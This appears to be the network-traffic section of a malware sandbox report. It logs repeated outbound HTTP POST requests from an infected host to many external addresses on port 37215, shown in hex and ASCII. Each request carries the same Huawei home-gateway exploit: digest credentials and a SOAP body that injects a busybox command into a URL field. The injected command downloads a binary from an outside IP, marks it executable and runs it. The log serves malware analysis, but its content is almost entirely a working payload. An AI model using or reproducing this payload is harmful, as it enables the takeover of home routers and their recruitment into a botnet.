                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              639192.168.2.153405841.114.109.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.223989010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              640192.168.2.1555306186.36.234.14137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224050045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              641192.168.2.1557394138.248.66.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224051952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              642192.168.2.1541068122.140.48.137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224102020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              643192.168.2.1539184197.66.149.337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224124908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              644192.168.2.155799845.29.247.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224168062 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              645192.168.2.1555678122.20.127.17637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224178076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              646192.168.2.1543502156.162.205.25437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224178076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              647192.168.2.1543464122.82.219.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224227905 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              648192.168.2.1558078210.97.175.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224277020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
